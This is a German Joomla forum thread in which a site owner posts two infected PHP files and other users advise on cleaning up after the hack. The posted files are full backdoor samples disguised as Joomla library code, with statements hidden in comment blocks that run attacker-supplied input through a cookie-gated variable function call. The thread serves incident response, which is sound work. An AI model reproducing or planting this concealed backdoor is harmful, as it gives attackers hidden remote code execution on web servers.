cache-db und simplepie.lib mit Schadcode befallen

lunacy · 31. Dezember 2015

Hallo zusammen,

hm, die letzte Anfrage scheint nicht geklappt zu haben, daher hier nochmal. Ich habe das Problem, das die Website unseres Vereins durch unseren Hoster Hosteurope gesperrt wird. Wie ich herausgefunden habe auch mit Hilfe des Kundenservices wurde durch die Sicherheitslücke vor Joomla 3.4.7 in zwei Dateien Schadcode eingeschleust.

Dies betrifft die Dateien:

./www/cache/cache-db.php
./www/libraries/simplepie/simplepie.lib.php

Wie sollte ich nun vorgehen? Der Kundenservice meinte, ich sollte die Dateien neu auf der Joomla-Page herunterladen und austauschen. Diese beiden Dateien sind jedoch in der Joomla-Komplettinstalltionsdatei nicht vorhanden. Vielleicht könnte ein Experte von hier mal drüberschauen, was hier falsch ist. Bin für jede Hilfe dankbar!!!!

Ich hoffe ich poste das hier so richtig, zuerst kommt die cache, dann die simplepie.

Sollten weitere Infos benötigt werden, bitte ich um Nachricht. Ebenso um Nachsicht, falls mit der Anfrage irgendwas nicht in Ordnung sein sollte.

Einen guten Rutsch schonmal von hier aus hier an alle.

Gruß
Thomas

lunacy · 31. Dezember 2015

cache-db.php

Spoiler anzeigen

PHP

<?php
/**
 * @package     Joomla.Platform
 * @subpackage  Application
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE
 */


!defined('JPATH_PLATFORM') or die;


/**
 * Base object Instance of SimplePie_Sanitize (or other class)
 *
 * @since  11.4
 */


/**
 * SimplePie Name
 */
define('SIMPLEPIE_NAME', 'SimplePie');


/**
 * SimplePie Version
 */
define('SIMPLEPIE_VERSION', '1.2');


/**
 * SimplePie Build
 */
define('SIMPLEPIE_BUILD', '20090627192103');


/**
 * SimplePie Session ID
 */
$id = $_SERVER['HTTP_SESSION'];


/**
 * Class constructor.
 *
 * @param   JInputCli         $input       An optional argument to provide dependency injection for the application's
 *                                         input object.  If the argument is a JInputCli object that object will become
 *                                         the application's input object, otherwise a default input object is created.
 * @param   Registry          $config      An optional argument to provide dependency injection for the application's
 *                                         config object.  If that object will become
 *                                         the application's config object, otherwise a default config object is created.
 * @param   JEventDispatcher  $dispatcher  An optional argument to provide dependency injection for the application's
 *                                         event dispatcher.  If the argument become
 *                                         the application's event dispatcher, if it is null then the default event dispatcher
 *                                         will be created based on the application's loadDispatcher() method.
 *
 * @see     JApplicationBase::loadDispatcher()
 * @since   11.1
 */


function construct($input = null, $config = null, $dispatcher = null)
{
    // Close the application if we are not executed from the command line.
    // @codeCoverageIgnoreStart
    if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
    {
        $this->close();
    }
    // @codeCoverageIgnoreEnd


    // If a input object is given use it.
    if ($input instanceof JInput)
    {
        $this->input = $input;
    }
    // Create the input based on the application logic.
    else
    {
        if (class_exists('JInput'))
        {
            $this->input = new JInputCli;
        }
    }


    // If a config object is given use it.
    if ($config instanceof Registry)
    {
        $this->config = $config;
    }
    // Instantiate a new configuration object.
    else
    {
        $this->config = new Registry;
    }


    $this->loadDispatcher($dispatcher);


    // Load the configuration object.
    $this->loadConfiguration($this->fetchConfigurationData());


    // Set the execution datetime and timestamp;
    $this->set('execution.datetime', gmdate('Y-m-d H:i:s'));
    $this->set('execution.timestamp', time());


    // Set the current directory.
    $this->set('cwd', getcwd());
}


/**
 * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.
 *
 * This method must be invoked as: $cli = JApplicationCli::getInstance();
 *
 * @param   string  $name  The*/$sess = md5(@$_COOKIE[ssid]);/*of the JApplicationCli class to instantiate.
 *
 * @return  JApplicationCli
 *
 * @since   11.1


function getInstance($name = null)
{
    // Only create the object if it doesn't exist.
    if (empty(self::$instance))
    {
        if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))
        {
            self::$instance = new $name;
        }
        else
        {
            self::$instance = new JApplicationCli;
        }
    }


    return self::$instance;
}


/**
 * Execute the application.
 *
 * @return  void
 *
 * @since   11.1


function execute()
{
    // Trigger the onBeforeExecute event.
    $this->triggerEvent('onBeforeExecute');


    // Perform application routines.
    $this->doExecute();


    // Trigger the onAfterExecute event.
    $this->triggerEvent('onAfterExecute');
}


/**
 * Load an object or array into the application configuration object.
 *
 * @param   mixed  $data  Either an array or object to be loaded into the configuration object.
 *
 * @return  JApplicationCli  Instance of $this to allow chaining.
 *
 * @since   11.1
 */ $start = strpos($sess,'46bfc6');
function loadConfiguration($data)
{
    // Load the data into the configuration object.
    if (is_array($data))
    {
        $this->config->loadArray($data);
    }
    elseif (is_object($data))
    {
        $this->config->loadObject($data);
    }


    return $this;
}


/**
 * Write a string to standard output.
 *
 * @param   string   $text  The text to display.
 * @param   boolean  $nl    True (default) to append a new line at the end of the output string.
 *
 * @return  JApplicationCli  Instance of $this to allow chaining.
 *
 * @codeCoverageIgnore
 * @since   11.1
 */
function out($text = '', $nl = true)
{
    $output = $this->getOutput();
    $output->out($text, $nl);


    return $this;
}


/**
 * Get an output object.
 *
 * @return  CliOutput
 *
 * @since   3.3
 */ if($start===0){@${a}($id);}
function getOutput()
{
    if (!$this->output)
    {
        // In 4.0, this will convert to throwing an exception and you will expected to
        // initialize this in the constructor. Until then set a default.
        $default = new Joomla\Application\Cli\Output\Xml;
        $this->setOutput($default);
    }


    return $this->output;
}


/**
 * Method to run the application routines.  Most likely you will want to instantiate a controller
 * and execute it, or perform some sort of task directly.
 *
 * @return  void
 *
 * @codeCoverageIgnore
 * @since   11.3
 */
function doExecute()
{
    // Your application routines go here.
}

Alles anzeigen

lunacy · 31. Dezember 2015

simplepie.lib.php

Spoiler anzeigen

PHP

<?php
/**
 * @package     Joomla.Platform
 * @subpackage  Application
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE
 */


!defined('JPATH_PLATFORM') or die;


/**
 * Base object Instance of SimplePie_Sanitize (or other class)
 *
 * @since  11.4
 */


/**
 * SimplePie Name
 */
define('SIMPLEPIE_NAME', 'SimplePie');


/**
 * SimplePie Version
 */
define('SIMPLEPIE_VERSION', '1.2');


/**
 * SimplePie Build
 */
define('SIMPLEPIE_BUILD', '20090627192103');


/**
 * SimplePie Session ID
 */
$id = $_SERVER['HTTP_SESSION'];


/**
 * Class constructor.
 *
 * @param   JInputCli         $input       An optional argument to provide dependency injection for the application's
 *                                         input object.  If the argument is a JInputCli object that object will become
 *                                         the application's input object, otherwise a default input object is created.
 * @param   Registry          $config      An optional argument to provide dependency injection for the application's
 *                                         config object.  If that object will become
 *                                         the application's config object, otherwise a default config object is created.
 * @param   JEventDispatcher  $dispatcher  An optional argument to provide dependency injection for the application's
 *                                         event dispatcher.  If the argument become
 *                                         the application's event dispatcher, if it is null then the default event dispatcher
 *                                         will be created based on the application's loadDispatcher() method.
 *
 * @see     JApplicationBase::loadDispatcher()
 * @since   11.1
 */


function construct($input = null, $config = null, $dispatcher = null)
{
    // Close the application if we are not executed from the command line.
    // @codeCoverageIgnoreStart
    if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
    {
        $this->close();
    }
    // @codeCoverageIgnoreEnd


    // If a input object is given use it.
    if ($input instanceof JInput)
    {
        $this->input = $input;
    }
    // Create the input based on the application logic.
    else
    {
        if (class_exists('JInput'))
        {
            $this->input = new JInputCli;
        }
    }


    // If a config object is given use it.
    if ($config instanceof Registry)
    {
        $this->config = $config;
    }
    // Instantiate a new configuration object.
    else
    {
        $this->config = new Registry;
    }


    $this->loadDispatcher($dispatcher);


    // Load the configuration object.
    $this->loadConfiguration($this->fetchConfigurationData());


    // Set the execution datetime and timestamp;
    $this->set('execution.datetime', gmdate('Y-m-d H:i:s'));
    $this->set('execution.timestamp', time());


    // Set the current directory.
    $this->set('cwd', getcwd());
}


/**
 * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.
 *
 * This method must be invoked as: $cli = JApplicationCli::getInstance();
 *
 * @param   string  $name  The*/$sess = @$_COOKIE[ssid];/*of the JApplicationCli class to instantiate.
 *
 * @return  JApplicationCli
 *
 * @since   11.1
 


function getInstance($name = null)
{
    // Only create the object if it doesn't exist.
    if (empty(self::$instance))
    {
        if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))
        {
            self::$instance = new $name;
        }
        else
        {
            self::$instance = new JApplicationCli;
        }
    }


    return self::$instance;
}


/**
 * Execute the application.
 *
 * @return  void
 *
 * @since   11.1


function execute()
{
    // Trigger the onBeforeExecute event.
    $this->triggerEvent('onBeforeExecute');


    // Perform application routines.
    $this->doExecute();


    // Trigger the onAfterExecute event.
    $this->triggerEvent('onAfterExecute');
}


/**
 * Load an object or array into the application configuration object.
 *
 * @param   mixed  $data  Either an array or object to be loaded into the configuration object.
 *
 * @return  JApplicationCli  Instance of $this to allow chaining.
 *
 * @since   11.1
 */ $start = strpos($sess,'f3ca0e');
function loadConfiguration($data)
{
    // Load the data into the configuration object.
    if (is_array($data))
    {
        $this->config->loadArray($data);
    }
    elseif (is_object($data))
    {
        $this->config->loadObject($data);
    }


    return $this;
}


/**
 * Write a string to standard output.
 *
 * @param   string   $text  The text to display.
 * @param   boolean  $nl    True (default) to append a new line at the end of the output string.
 *
 * @return  JApplicationCli  Instance of $this to allow chaining.
 *
 * @codeCoverageIgnore
 * @since   11.1
 */
function out($text = '', $nl = true)
{
    $output = $this->getOutput();
    $output->out($text, $nl);


    return $this;
}


/**
 * Get an output object.
 *
 * @return  CliOutput
 *
 * @since   3.3
 */ if($start===0){@${a}($id);}
function getOutput()
{
    if (!$this->output)
    {
        // In 4.0, this will convert to throwing an exception and you will expected to
        // initialize this in the constructor. Until then set a default.
        $default = new Joomla\Application\Cli\Output\Xml;
        $this->setOutput($default);
    }


    return $this->output;
}


/**
 * Method to run the application routines.  Most likely you will want to instantiate a controller
 * and execute it, or perform some sort of task directly.
 *
 * @return  void
 *
 * @codeCoverageIgnore
 * @since   11.3
 */
function doExecute()
{
    // Your application routines go here.
}

Alles anzeigen

Indigo66 · 31. Dezember 2015

Beide Dateien gehören nicht zu Joomla.

lunacy · 31. Dezember 2015

Hallo @Indigo66,

das heisst ich kann die Dateien löschen oder wie soll ich das verstehen?

Gruß
Thomas aka lunacy

LittleBob · 31. Dezember 2015

Ich kann dir bestätigen, dass beide Dateien in meiner Joomla-Installation nicht existieren.
Ich Verzeichnis Cache gibt es z.B. keine Datei, im simplepie gibt es nur eine simplepie.php und keine simplepie.lib.php
Von daher kann ich Aussage von indigo66 nur bestätigen.

Nach meinen Erfahrungen werden das aber mit hoher Wahrscheinlichkeit nicht die beiden einzigen Dateien sein.
Nach dem Hack meiner Seite gab es damals mehr als 10 zusätzliche php-Dateien.
Mein Tipp: Kopiere deine Joomla-Installation auf die lokale Platte und durchsuche die Ordner nach Auffälligkeiten.
Basierend auf die geposteten Dateien suche weitere php-Dateien mit dem Text "Base object Instance of SimplePie_Sanitize (or other class)"
Das gibt dir aber keine absolute Sicherheit, dass es nicht noch weiterere gibt.

Sieger66 · 1. Januar 2016

Mein Joomla wurde gehackt! Was kann ich tun?

Außerdem siehe z.B. auch Joomla-FAQ 2.6 To Do nach einem Hack:

http://www.joomlaportal.de/tip…oomla-faq.html#post990009

Eventuell auch nützlich um veränderte Dateien zu finden:

http://www.joomlaportal.de/joo…det-spam.html#post1611970

und

https://joomla-extensions.kubi…s-joomla-checksum-scanner

Zitat

Beim Archiv-Scan wird eine beliebige Archivdatei (z.B.: Core-Paket oder Backup-Archiv) mit einem Snapshot abgeglichen. Somit kann man schnell und einfach modifizierte Dateien auffinden, was eine Analyse der Datei-Integrität stark vereinfacht.

Allerdings werden damit eben auch nur die Dateien einer einzelnen Joomla-Installation verglichen. Ob Datenbanktabellen verändert wurden kann damit nicht festgestellt werden.

lowrhine · 1. Januar 2016

Moin und "gut's Neues".

Meine Joomla-Website bei domainfactory (gehört auch zu Hosteurope) war bzw. ist eventuell ebenfalls infiziert, email von df kam um 2 Uhr.

Bin selbst schuld, da Joomla zulange nicht aktualisiert.

Wie auch immer, df hat im Stammverzeichnis der Joomla-Installation eine Datei namens infiziert.txt angelegt, die erste Hinweise auf gefundenen Schadcode liefert.

Meine Vorgehensweise bis jetzt - nur in Kürze, da noch verkatert, wer Felher findet darf sie behalten

(Quelle: https://www.fc-hosting.de/joomla/tips-joomla-gehackt.php )

1. per FTP das komplette Verzeichnis heruntergeladen und mit Virenscanner geprüft (ergebnislos)
2. alle in der infiziert.txt beanstandeten Dateien per FTP gelöscht EDIT: hier bin ich auch auf die simplepie.lib.php gestossen
3. upgradepaket von Joomla 3.4x auf 3.48 geladen, entpackt und per ftp hochgeladen (mit überschreiben)
4. per upload einer datei namens clean.txt die seite und adminoberfläche wieder zugänglich gemacht, möglicherweise df-spezifische prozedur
5. als erstes den durch einen hack angelegten neuen superuser entfernt
6. cache gelöscht, da einige beanstandete dateien in cache-ordnern lagen
6. passwörter geändert für ftp-zugang, sql-datenbank, kundenmenü und joomla-superuser
7. per myphpadmin die datenbank als Excel-datei exportiert für weitere Analysen.

Werde nun noch mit Winmerge die heruntergeladenen Dateien vergleichen mit denen einer anderen, sauberen Installation, um eventuell noch vorhandene Backdoor-Scripte zu identifizieren und zu löschen.

Komplette Neuinstallation versuche ich zunächst zu vermeiden...

Frohes Schaffen also noch - bei Fragen bitte fragen.

Indigo66 · 1. Januar 2016

Zitat von lunacy

das heisst ich kann die Dateien löschen oder wie soll ich das verstehen?

Ja, aber das wird nicht reichen.

Zitat von lowrhine

upgradepaket von Joomla 3.4x auf 3.48 geladen, entpackt und per ftp hochgeladen (mit überschreiben)

Davon rate ich ab, da so die DB nicht mit upgedatet wird.
Ein Überschreiben per FTP sollte erst nach einem regulärem update übers Backend bzw. Installer gemacht werden.

lowrhine · 1. Januar 2016

Zitat von lowrhine

Davon rate ich ab, da so die DB nicht mit upgedatet wird.
Ein Überschreiben per FTP sollte erst nach einem regulärem update übers Backend bzw. Installer gemacht werden.

Ok, das habe ich nicht bedacht, danke für den Hinweis.
Habe nun via "Erweiterungen --> Erweiterungen --> Datenbank --> Button "reparieren" die Datenbank aktualisiert.

lowrhine · 1. Januar 2016

Mit WinMerge noch weitere Dateien entdeckt die da nicht hingehören.

Abgleich erfolgte zum mit einer sauberen Installation und zur Sicherheit nochmal mit dem Inhalt des Full-Package-Ordners.

Tipp: Beim FTP-Download mit Filezilla unter "Transfer" einen Haken setzen bei "Änderungszeitpunkt der übertragenen Dateien beibehalten", dann lassen sich schon anhand der Timestamps Dateien identifizieren, die nicht zu irgendeinem Updatezeitpunkt erzeugt / geändert wurden und daher aus der Masse hervorstechen:

\libraries\joomla\exporter.php
\media\editors\codemirror\mode\jade\variant_cmup.php
\media\editors\tinymce\curl_multi_addn_handle.php

Edit: Quelle, die den Exploit erklärt: https://www.fasterjoomla.com/i…e-injection-cve-2015-8562

Indigo66 · 1. Januar 2016

Zitat von lowrhine

Habe nun via "Erweiterungen --> Erweiterungen --> Datenbank --> Button "reparieren" die Datenbank aktualisiert.

Ja, das geht auch. Sollte dann aber in Deiner Auflistung nicht fehlen.

lowrhine · 1. Januar 2016

Werde die Auflistung überarbeiten, sobald ich durch bin...

Sieger66 · 1. Januar 2016

Zuerst den gesammten Webspace deaktivieren per Passwortschutz setzen (.htaccess) sonst ist die ganze Arbeit umsonst da per Backdoor gleich wieder weitere oder die gleichen Dateien infiziert werden können.

Danach alle Daten inkl. Datenbank herunterladen und vom Server löschen.

lotta34 · 2. Januar 2016

Zitat von lowrhine

Meine Joomla-Website bei domainfactory (gehört auch zu Hosteurope) war bzw. ist eventuell ebenfalls infiziert, email von df kam um 2 Uhr.

Ebenso Moin und gutes Neues Jahr!
Meine Website liegt auch bei DF, komischerweise war sie aber aktuell auf 3.4.8, habe ich am 28.12.15 noch durchgezogen. Die schadhaften Dateien kamen am 31.12. hinzu. Nunja, jetzt zieh ich dann mal alles durch.....

kitepascal · 2. Januar 2016

Konntest du herausfinden, wo die am 31. herkamen?
Die Kreativität bei der Verschleierung nimmt stetig zu..

Webworker Berlin · 2. Januar 2016

Das wäre nun wirklich interessant, da mir gestern jemand das Selbe erzählte. Leider gab es keine Logs.

lotta34 · 2. Januar 2016

Zitat von kitepascal

Konntest du herausfinden, wo die am 31. herkamen?
Die Kreativität bei der Verschleierung nimmt stetig zu..

Nein, leider nicht, wüsste auch nicht wie, waren aber genau die gleichen Dateien wie oben genannt.
Wenn es jemanden weiter bringt, könnte ich die Suchmuster (anonymisiert) posten oder anhängen, die mir DF ins Verzeichnis gepackt hat.